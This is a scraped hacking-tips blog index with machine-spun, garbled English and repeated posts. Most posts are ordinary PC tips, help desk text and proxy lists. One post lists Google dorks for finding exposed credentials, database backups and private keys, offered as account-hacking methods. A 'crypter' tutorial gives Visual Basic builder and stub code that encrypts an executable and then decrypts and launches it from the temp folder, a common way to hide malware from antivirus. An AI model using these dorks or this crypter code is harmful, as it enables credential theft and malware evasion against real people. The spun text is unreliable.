Showing posts with label Win XP Tricks. Show all posts

HACKING ACCOUNT USING DORK !!!




Facebook and different on-line service are employing a misfit to save lots of the login id that's username and positive identification therefore here may be a trick to hack any account mistreatment google misfit for begineers


NOTE:- FOR academic PURPOSE solely. i'm NOT liable for something you are doing !!!



Things required:-

                                        1. a contemporary web browser and a net.
                                         2. Time


Level : Beginner


Method 1: Facebook! we'll be employing a google misfit to search out usernames and passwords of the many accounts together with Facebook!
The Dork: intext:charset_test= email= default_persistent=
Enter that into Google, and you may be given with many sites that have username and passwords lists!



Method 2: WordPress! this can explore for WordPress backup files that do contain the passwords, and every one knowledge for the site!

The Dork: filetype:sql inurl:wpcontent/ backup-*



Method 3: WWWBoard! this can explore for the user and passwords of WWWBoard users.

The Dork: inurl:/wwwboard/passwd.txt



Method 4: FrontPage! this can realize all users and passwords, almost like on top of.

The Dork: ext:pwd inurl:(service | authors | directors | users) "# - FrontPage-"

   
               
Method 5: Symfony!This finds info data and logins.

The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" - supply -repository


 methodology 6: TeamSpeak! (big one!)This can rummage around for the server.dbs file (a Sqlite info file With the SuperAdmin username and password!!!)


The Dork: server-dbs "intitle:index of"



Method 7: TeamSpeak2!!! (this one is additionally big!)This can realize the log file that has the Super Admin user and pass within the prime a hundred lines. explore for "superadmin account info:"

The Dork: "inurl:Teamspeak2_RC2/server.log"



Method 8: Get Admin pass!Simple misfit that appearance for all sorts of admin information.

The Dork: "admin account info" filetype:log



Method 9: personal keys! (not any more!) this can realize any .pem files that contain personal keys.

The Dork: filetype:pem pem intext:private




And the final one, the regular directory packed with passwords....

Method 10: The Dir of Passwords! easy one!

The Dork: intitle:"Index of..etc"  eg:- positive identification 



THANKYOU FOR VISITING.
KEEP VISITING...
Read more

How to Hide Hard drives on your pc

In this wonderful pc tricks I’ll show you that however you'll be able to hide a drive. we tend to invariably hide our folders or different documents for security purpose or personal causes. once reading this tricks you'll be able to hide your pc Winchester drive once required.Non-hide method also are given. this can be extremely a wonderful pc tricks.

Hide your Drives a lot of easily:



Hide:



To hide a Drive follow the subsequent steps that area unit given below:

1. initially head to the ‘Start Button’ and head to “Run” Or press “Windows brand key” + R.

2. sort cmd and press Enter. For this reason prompt can open.

3. Write diskpart within the prompt and press Enter.

4. Then write list volume and press Enter. at that time you may see the amount variety and Drive letter of the Drives.
5. currently if you would like to cover a Drive you have got to pick its Volume variety. to try to to that write choose volume one (Let we wish to cover a drive that Volume variety is 1).

6.Then write take away letter E. Here E is that the drive Letter of that drive that Volume variety is one.

7.Then restart your pc. once restart pc Drive E can Hide .

Non-Hide:

To Non-hide a Drive follow the subsequent steps that area unit given below:

Follow the primary four steps(1-4) that area unit given higher than during this post.
Then :

5. currently if you would like to non-hide a Drive you have got to pick its Volume variety. to try to to that write choose volume one (Let we wish to non-hide a drive that Volume variety is 1).

6.Then write assign letter E. Here E is that the drive Letter of that drive that Volume variety is one.

7. Then restart your pc. once restart pc Drive E can show.

I think to cover drives this tricks is most useful to you.......
Read more

Help Desk Software

What is help desk Software?


Before deciding if facilitate table software system is well worth the effort, you wish to grasp what help desk software system is. Is it associate email management system wherever you handle email communication from shoppers or customer? sure enough such software system will embody this practicality, however help desk software system is sometimes rather more than simply managing email.

Is facilitate desk software system question and answer management? once more, such software system will be, however it's always rather more.

Help table software system permits you to:-

1)Keep track of incoming requests for help.
2)Keep tabs on such help requests.
3)Manage the standing of help requests.
4)Manage issue resolution.
5)Provide a method of act commonly asked queries (FAQ)s to your shoppers and customers.
6)Provide a method for your shoppers or customers to resolve problems on their own.

Is There a requirement for facilitate table Software?

Almost all businesses need client interaction. whether or not you are commerce to them, providing them a service, or creating one thing they'll use, you are going to want to speak together with your customers. you are positively attending to wish to form certain your customers will contact you when you are doing business with them.

After-sales support is a very important a part of overall client satisfaction. happy customers area unit repeat customers and your best supply of ad (word of mouth). What you wish to make your mind up on is however you are going to move together with your customers and the way you are going to manage this interaction.

Regular mail is just too slow, and phone support is pricey to run and frustrating for patrons - lost or born calls, being on hold awaiting a representative, and lack of satisfactory follow-up.

Help desk software system permits you to trace your client support contact info, client contact info, what the customer's issue is, if the matter is resolved or not.

Some reasonably help desk management software system is important in managing your after-sales contact together with your customers and shoppers.

How Would You enjoy help desk Software?

Help table software system permits you to tie all of those client support management problems along.
you'll be able to keep track of your customers and their problems, keep track of the standing of the problems (unresolved, in-process, solved, etc.), and keep track of however typically sure issues occur.

For example, if you have got a retardant that multiple customers area unit having, you'll be able to use the assistance table software system to report on this issue. Once you see trends like this, you'll be able to take steps to resolve the matter for current customers and keep it from happening within the future.

Likewise, you'll be able to keep track of the resources you have got allotted to a specific issue. during this fashion, you'll be able to keep from having quite one person performing on constant issue at constant time.

When a problem is resolved, different support personnel will use that info contained within the issue-tracking portion of your facilitate table software system to resolve similar or identical problems they are performing on.

You can see the advantages of victimisation facilitate table software system.
(Noobs Acadmy)


Read more

Windows Raid Recovery

Assalam-o-Alaikum! Friends today i am going to notify you about a program named Windows Raid Recovery. which will help you to restore/Backup or for Formatted hard drive recovery etc. This one is very Useful and affective as well.




Product Highlights:-



retrieve NTFS-formatted Windows RAIDs, together with hardware RAID and Windows programsbundle RAIDs,, interior minutes
Supports RAID-0 and RAID-5 configuration
No alternative programs package needed
Finds RAID parameters, like begin part, band of colour dimensions, rotation, and drivealignment mechanically
Easy to use wizard, no client input needed, wholeheartedly machine-controlled recovery
Run from the Runtime reside CD or a WinPE boot CD-ROM

Data Recovery programs bundle for Windows RAIDs:-

                                    Windows Raid Recovery retrieves the entire content of your broken RAID inside minutes. you may be ready to copy the documents and folders over to a distinct disk.RAID Recovery for Windows works for NTFS-formatted RAID-0 or RAID-5 configurations. It supports each, hardware RAIDs organised by the circuit board or a manager card, andprograms bundle RAIDs organised by Windows (dynamic disk arrays).

                                                                                                                  Remove the drives from the RAID controller and fix them regionally to your appliance. certify the drives ar all identified by Windows computer disk administration. If you're attempting to retrievea RAID-5, it's satisfactory to adhere one propel but the general variety of drives in this RAID. RAID Recovery for Windows conjointly works with images of your drives.


Install Windows Raid Recovery to your pc and begin the program. In Vista, Windows 7, or Windows eight you would like to right-click the program icon and select "Run as Administrator".

A wizard can direct you thru the recovery. some of minutes later, aide Explorer-like window candisplay all recoverable documents and folders. actually you'll copy your files over to a different disk. you'll conjointly read several file kinds before repetition them, e.g. images, articles, etc.

RAID Recovery for Windows is simple to use. It mechanically finds all parameters needed for the recovery, like RAID begin sector, band of colour size, rotation, and propel alignment. everyone isactually ready to retrieve his own RAID. No data retrievebackdrop needed. No should to getthe other programs bundle.

Supported RAIDs:



NTFS-formatted RAID-0 and RAID-5 controlled by the motherboard or a RAID controllerbusiness card (hardware RAID)

NTFS-formatted RAID-0 and RAID-5 administered by Windows (Windows programs bundleRAID)
RAID Recovery for Windows additional characteristics:

document viewer, that allows you to ascertain the content of effectively any document
seek perform, that permits you to try to to in depth discover for encompassing text or files
Run RAID Recovery for Windows from our Runtime Live CD or a BartPE boot CD-ROM
Other RAID recovery resources
Read more

How to Create a Crypter?

Assalam-o-Alaikum! HaXoR is here. Hope u like my post.



How To build a crypter ?



What you'll need:

Visual Basic half dozen or Visual Basic half dozen transportable
A RC4 module (Click Here to Download
A brain
The RC4 module and Visual Basic half dozen transportable can have the transfer links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also called ARCFOUR or ARC4 that means Alleged RC4, see below) is that the most generally used stream cipher and is employed in protocols like Secure Sockets Layer (SSL) (to defend net traffic) and WEP (to secure wireless networks).

Stub:
A method stub or just stub in software development may be a piece of code used to exchange for a few different programming practicality. A stub might simulate the behavior of existing code (such as a procedure on a far off machine) or be a short lived substitute for yet-to-be-developed code. Stubs square measure so most helpful in porting, distributed computing additionally as general package development and testing.

Builder:
A builder is sometimes the consumer to make/do one thing to a file, and it's imagined to come with a stub. The builder sometimes permits the stub to simulate the behaivor of existing code, and than it makes the file/does one thing to a file.

Here is the Real Work Starts

2. Building your crypter.

Now, open up Visual Basic half dozen or Visual Basic transportable. to form the task easier, open 2 Visual Basic half dozen programs. One goes to be the builder, and one goes to be the stub.

Now, lets begin on the builder. Add a RC4 module, and lets prolong. initial of all, add one label that says File Path:, a text box right beside File Path:, a button that says Browse or ..., and another button that says sepulcher or Build. Now, lets add the CommonDialog management. Add a CommonDialog and name it commondlg. Now, lets double click the button that says Browse or .... Add this code, and i will justify it.

Code:
With commondlg 'CommonDialog1.
.Filter = possible files | *.exe 'The file used for crypting. (*.exe)
.DialogTitle = Please choose a possible file... 'The title of the dialog.
.ShowOpen 'Show the dialog.
End With
TextBox1.Text = commondlg.FileName 'Make TextBox1.Text because the selected  name.

The With commondlg command calls CommonDialog1.
The .Filter half permits you to decide on what files you merely wish to be selected .
The .DialogTitle command is that the title of the dialog (the prompt that tells you which ones file you would like to pick for crypting).
The .ShowOpen command shows the dialog.
End With can finish CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the chosen name.

Now, click the button that says Build or sepulcher. Add this code. It explains it, therefore please take time to scan what it says.
Code:
Dim sStub As String, sFile As String 'This command can declare the 2 strings.
Open App.Path & stub.exe For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the house.
Get #1, , sStub 'This puts in a very house within the file.
Close #1 'This closes the file.
Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the house.
Get #1, , sFile 'This puts an area within the file.
Close #1 'This closes the file.

Open App.Path & output.exe For Binary As #1 'This creates the crypted file as output.exe.
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds choice|the choice} FileSplit and therefore the RC4 option.
Close #1 'This closes the file.

MsgBox (File crypted with success!) 'This is that the prompt to point out the message that the program successfully crypted the file.

Now, you may have a slip which will show you that FileSplit and Pass isn't declared. To do so, we'll add the declarations on the highest of the writing.

Code:
Const FileSplit = 'The file split.
Const Pass = s0rasRC4Tutorial 'The RC4 countersign.

For this tutorial, we'll be victimisation s0rasRC4Tutorial because the RC4 countersign.

Now, lets begin on the stub. Add the RC4 module, and build a brand new module known as modMain. Add this code in modMain:
Code:
Const FileSplit = 'The file split.
Const Pass = s0rasRC4Tutorial 'The RC4 password; It should be constant because the one on the builder!

Public Declare perform ShellExecute Lib Shell32.dll Alias ShellExecuteA (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main a part of the stub.
Dim sStub As String, sFile As String 'This can declare the strings once more, a bit like we have a tendency to did on the builder.
Open App.Path & & App.EXEName & .exe For Binary As #1 'Opens up the chosen .exe file.
sStub = Space(LOF(1)) 'This can declare the house.
Get #1, , sStub 'This puts an area within the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This can split the file and therefore the stub.
Open Environ(tmp) & decrypted.exe For Binary As #1 'This can build a decrypted move into the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This can add the RC4 countersign to the file with the chosen RC4 countersign.

Call ShellExecute(0, vbNullString, Environ(tmp) & decrypted.exe, vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted move into the temporary files folder.

End Sub 'This ends Public Sub Main().

The code are teaching you. Once you are done, take away the Form1.

3. Conclusion
I hope you liked  this tutorial, and that i hope you learned plenty concerning crypting

Thnx For Visiting
ReGarDs (HaXoR and Noobs Acadmy)
Read more

What is SQL Injection

Welcome Friends to my journal. HaXoR is Here.I am straightforward boy with tough mind and my locution is that knowledge is free. that's why i'm sharing my knowledge with so you'll be able to additionally get get pleasure from it.

              what is SQL(Structured query Language)?


                                                                                         SQL (pronounced "ess-que-el") stands for Structured query language. SQL is employed to speak with a information. in step with ANSI (American National Standards Institute), it's the quality language for computer database management systems. 
                                                                 SQL statements area unit accustomed perform tasks like update information on a information, or retrieve information from a information. most information systems use SQL, most of them even have their own further proprietary extensions that area unit sometimes solely used on their system. 
                          However, the quality SQL commands like "Select", "Insert", "Update", "Delete", "Create", and "Drop" will be accustomed accomplish virtually everything that one must do with a information. This tutorial can offer you with the instruction on the fundamentals of every of those commands additionally as enable you to place them to follow using the SQL Interpreter.

                           Thanks For Visiting Us!

                              ReGarDs (HaXoR)
Read more

What is SQL Injection

Welcome Friends to my journal. HaXoR is Here.I am straightforward boy with tough mind and my locution is that knowledge is free. that's why i'm sharing my knowledge with so you'll be able to additionally get get pleasure from it.

              what is SQL(Structured query Language)?


                                                                                         SQL (pronounced "ess-que-el") stands for Structured query language. SQL is employed to speak with a information. in step with ANSI (American National Standards Institute), it's the quality language for computer database management systems. 
                                                                 SQL statements area unit accustomed perform tasks like update information on a information, or retrieve information from a information. most information systems use SQL, most of them even have their own further proprietary extensions that area unit sometimes solely used on their system. 
                          However, the quality SQL commands like "Select", "Insert", "Update", "Delete", "Create", and "Drop" will be accustomed accomplish virtually everything that one must do with a information. This tutorial can offer you with the instruction on the fundamentals of every of those commands additionally as enable you to place them to follow using the SQL Interpreter.

                           Thanks For Visiting Us!

                              ReGarDs (HaXoR)
Read more

How to open Blocked or Banned Websites?

Welcome Friends to my Blog.HaXoR is Here.I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

How To Open banned Websites With Proxy Sites ?


There are several sites that are blocked by government as a result of breaking laws of their country. The user downloads several softwares to open these sites however find yourself being infected by  malware  virus.                            nowadays i will be able to share a trick with you guys which might assist you simply open these prohibited sites while not downloading something. As you recognize that there square measure several on-line proxies however everybody want a proxy server that is quicker and trusty.
                     Here during this post i'm revealing {an on-line|a web|an internet} proxy and a tutorial to open prohibited sites with the assistance of those online proxies that is trusty and quick. simply follow my step to open prohibited sites.
Also Read How to Hack facebook Account?
How To Open banned web site ?
There are many Proxy sites.which are used to open blocked or banned Websites.
1. Open www.incloak.com in your browser.
                                                                   You can conjointly use any proxy web site from list below List of fine Proxy Sites
2.enter the URL of the positioning that you wish to open like below.3. currently click the Hide me button and revel in.

http://aniscartujo.com/webproxy
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hagiomusic.info
http://www.greenpips.info
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.allfreehere.info
http://www.takefreely.info
http://autobypass.com
http://www.proxcity.info
http://www.proxyzip.org
http://www.cheekyproxy.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.hidemefast.com
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://myspaceproxyy.com
http://www.browsesneaky.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.proogle.info
http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.slyuser.com/
http://tenpass.com
http://pawxy.com
http://pawxy.org
http://logu.in

Read more

What Is GooGle Schemer?

Welcome Friends to my Blog.HaXoR is Here.I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

            What is Google Schemer?

Many individuals have a matter that what's Google schemer? 


currently daily all the people and blogger wish invite of this Google planner. This planner is Beta version therefore you'll use planner only if some one Invite you. Here i write a post on what's Google planner and the way to urge invite in Free.

Google deviser could be a Activity recommendation Engine. Google deviser offers you facility to find new things to try to to. you'll be able to share the deviser with you friends.

This Google deviser is Integrated with the Google and. If you've got Google and account than you may get access to the Google deviser.
You can additionally invite friends, and search the buddies to affix Google deviser.

How to Create Scheme ?

First of all, Log in to your schemer account.

And in "i want to box" type some thing which you want to do.
Or which you are planning for you day or Week End.

2)After it Just click on NEW SCHEME. So one box will pop
up. In that box select the option whether you want your

 SCHEME Private or Public?

3)Now Click on CREATE SCHEME. Your scheme is

created.

After creating the Scheme Go to YOUR SCHEME. Here you


 can see all the Scheme which you created. Click on the 

Scheme which you created. You will see detail information

 about the scheme. Who's is done it, inspiration,

 who want to do it.
If you want to tell someone about the scheme than Click on

HEADS UP. You can delete the scheme by clicking on the

 delete button.

ReGards (HaXoR)

Also Visit  Noobs Acadmy


Read more

What Is GooGle Schemer?

Welcome Friends to my Blog.HaXoR is Here.I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

            What is Google Schemer?

Many individuals have a matter that what's Google schemer? 



currently daily all the people and blogger wish invite of this Google planner. This planner is Beta version therefore you'll use planner only if some one Invite you. Here i write a post on what's Google planner and the way to urge invite in Free.

Google deviser could be a Activity recommendation Engine. Google deviser offers you facility to find new things to try to to. you'll be able to share the deviser with you friends.

This Google deviser is Integrated with the Google and. If you've got Google and account than you may get access to the Google deviser.
You can additionally invite friends, and search the buddies to affix Google deviser.

How to Create Scheme ?

First of all, Log in to your schemer account.

And in "i want to box" type some thing which you want to do.
Or which you are planning for you day or Week End.

2)After it Just click on NEW SCHEME. So one box will pop
up. In that box select the option whether you want your

 SCHEME Private or Public?

3)Now Click on CREATE SCHEME. Your scheme is

created.

After creating the Scheme Go to YOUR SCHEME. Here you


 can see all the Scheme which you created. Click on the 

Scheme which you created. You will see detail information

 about the scheme. Who's is done it, inspiration,

 who want to do it.
If you want to tell someone about the scheme than Click on

HEADS UP. You can delete the scheme by clicking on the

 delete button.

ReGards (HaXoR)

Also Visit  Noobs Acadmy


Read more